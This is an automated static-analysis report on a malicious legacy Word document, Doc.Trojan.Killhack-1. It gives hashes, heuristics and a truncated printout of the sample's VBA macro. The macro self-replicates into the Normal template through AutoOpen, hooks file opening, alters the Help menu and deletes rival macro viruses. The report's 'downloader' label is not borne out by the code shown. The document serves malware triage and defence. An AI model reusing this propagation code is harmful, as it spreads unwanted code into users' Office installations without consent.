Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 27829af7a44f6aab…

MALICIOUS

Office (OLE)

34.0 KB Created: 2000-07-06 23:45:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: b32a3d880f9bfc0552a5a33fa810d67d SHA-1: f0b2b4c79f4769c4d6b192275207097df989d461 SHA-256: 27829af7a44f6aabb230ba6d3ef35e2f5158a1fee51d35cf568af6d727777a3d
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Killhack-1. It contains VBA macros, including an AutoOpen subroutine, which attempts to copy itself to the Normal template. The script also modifies the 'Help' menu, suggesting an attempt to establish persistence or provide a backdoor for further actions. The embedded URL is benign, but the overall behavior indicates a malicious macro downloader.

Heuristics 5

  • ClamAV: Doc.Trojan.Killhack-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Killhack-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://come.to/un2mu In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15884 bytes
SHA-256: 67f099873d99bcc50a9f728d8cdfb14160d36cee6c7034e1579b13cc29d3c28c
Detection
ClamAV: Doc.Trojan.Killhack-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Kill_S129"


Dim Infected As Boolean
Dim NT, AD As Object


Sub AutoOpen()
  Dim installed As Boolean
  Dim im As Object
  Dim abt As CommandBarButton
  Dim i
  Dim oke As Boolean
  
  
  Set AD = ActiveDocument
  Set NT = NormalTemplate
  
  installed = False
  For Each im In NT.VBProject.VBComponents
     If im.Name = "Kill_S129" Then installed = True
  Next
  If Not (installed) Then
    Application.OrganizerCopy Source:=AD.FullName, Destination:=NT.FullName, Name:="Kill_S129", Object:=wdOrganizerObjectProjectItems
  End If
  
  Search_and_Kill
  oke = False
  For Each i In CommandBars("Help").Controls
    If i.Type = msoControlButton Then If i.Caption = "About Un2mU" Then oke = True
  Next
  If Not (oke) Then
    Set abt = CommandBars("Help").Controls.Add(Type:=msoControlButton)
    abt.Caption = "About Un2mU"
    abt.OnAction = "AboutUn2mU"
    abt.Enabled = True
    abt.Visible = True
    abt.Width = 79
    abt.Height = 19
    abt.Style = msoButtonIconAndCaption
  End If
End Sub
Sub FileOpen()
  Aof
  Dialogs(wdDialogFileOpen).Show
  Search_and_Kill
  Aon
End Sub
Sub RepairMenu()
Dim IC As CommandBarControl
Dim damaged As Boolean

On Error Resume Next
damaged = False
For Each IC In CommandBars("Help").Controls
  If IC.Caption = "Assalamu'alaikum Wr. Wb....." Then damaged = True
Next
If Not (damaged) Then
  For Each IC In CommandBars("Tools").Controls
    If IC.Caption = "Makmu, Cok.....!!!!" Then damaged = True
  Next
End If
If damaged Then
    MsgBox "Repair WORD from S129-effect", vbOKOnly, "Un2mU Virii division"
    CommandBars("Help").Controls("Assalamu'alaikum Wr. Wb.....").Caption = ("About Microsoft Word")
    CommandBars("Tools").Controls("Makmu, Cok.....!!!!").Caption = ("Macro")
    CommandBars("Tools").Controls("Tempe dan Tahu Enak...!!!").Caption = ("Templates and Add-ins...")
    CommandBars("Tools").Controls("Macro").Visible = True
    CommandBars("Tools").Controls("Macro").Enabled = True
    CommandBars("Tools").Controls("Templates and Add-ins...").Enabled = True
End If
Options.VirusProtection = True
Aon
End Sub

Sub Search_and_Kill()
  Dim im As Object
  On Error Resume Next
  Set AD = ActiveDocument
  Set NT = NormalTemplate
  For Each im In NT.VBProject.VBComponents
    If im.Name = "S129" Or im.Name = "S129Form" Then
      MsgBox "Found & Kills virus S129 at Normal template", vbOKOnly, "Un2mU WM-AV Ver 1.3"
      Application.OrganizerDelete Source:=NT.FullName, Name:=im.Name, Object:=wdOrganizerObjectProjectItems
    ElseIf im.Name = "astia" Then
      MsgBox "Found & Kills virus Titasic at Normal template", vbOKOnly, "Un2mU WM-AV Ver 1.3"
      Application.OrganizerDelete Source:=NT.FullName, Name:=im.Name, Object:=wdOrganizerObjectProjectItems
    ElseIf im.Name = "CyberHack" Or im.Name = "CyberForm" Then
      MsgBox "Found & Kills virus CyberHack/Dwiganteng at Normal template", vbOKOnly, "Un2mU WM-AV Ver 1.3"
      Application.OrganizerDelete Source:=NT.FullName, Name:=im.Name, Object:=wdOrganizerObjectProjectItems
    End If
    
  Next
  For Each im In AD.VBProject.VBComponents
    If im.Name = "S129" Or im.Name = "S129Form" Then
      MsgBox "Found & Kills virus S129 at " & AD.FullName, vbOKOnly, "Un2mU WM-AV Ver 1.3"
      Application.OrganizerDelete Source:=NT.FullName, Name:=im.Name, Object:=wdOrganizerObjectProjectItems
    ElseIf im.Name = "astia" Then
      MsgBox "Found & Kills virus Titasic at " & AD.FullName, vbOKOnly, "Un2mU WM-AV Ver 1.3"
      Application.OrganizerDelete Source:=NT.FullName, Name:=im.Name, Object:=wdOrganizerObjectProjectItems
    ElseIf im.Name = "CyberHack" Or im.Name = "CyberForm" Then
      MsgBox "Found & Kills virus CyberHack/Dwiganteng at " & AD.FullName, vbOKOnly, "Un2mU Virii division"
   
... (truncated)